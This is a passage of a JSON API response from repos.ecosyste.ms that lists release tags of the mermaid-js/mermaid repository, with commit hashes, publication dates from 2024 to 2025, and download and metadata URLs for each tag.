ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0